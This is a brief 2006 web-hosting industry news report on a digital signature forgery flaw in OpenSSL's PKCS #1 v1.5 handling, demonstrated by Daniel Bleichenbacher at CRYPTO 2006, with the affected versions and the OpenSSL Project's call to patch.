OpenSSL Forgery Scam Discovered
September 7, 2006 — (WEB HOST INDUSTRY REVIEW) — Security researchers have demonstrated a way to forge digital signatures that can mislead the OpenSSL software used in many secure Web servers and virtual private networks, reports Web analytics firm Netcraft (netcraft.com). The OpenSSL Project has issued patches to address the weakness, and is alerting users to upgrade or install the patches.
The signature forgery technique was first demonstrated last month by Bell Labs cryptographer Daniel Bleichenbacher at the CRYPTO 2006 conference. The forgery only works on specific keys (known as PKCS #1 v1.5), which are used by some certificate authorities in SSL server certificates.
“All software that uses OpenSSL to verify X.509 certificates is potentially vulnerable, as well as any other use of PKCS #1 v1.5,” OpenSSL said in its advisory. “This includes software that uses OpenSSL for SSL or TLS.” OpenSSL versions up to 0.9.7j and 0.9.8b are affected.
OpenSSL is an open source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols, which many software vendors deploy in their security products.
About theWHIR.com
Since 2000, The Web Host Industry Review has made a name for itself as the foremost authority of the Web hosting industry providing reliable, insightful and comprehensive news, interviews and resources to the hosting community. TheWHIR is an iNET Interactive property. For more information on iNET Interactive, visit http://www.inetinteractive.com
No related posts.
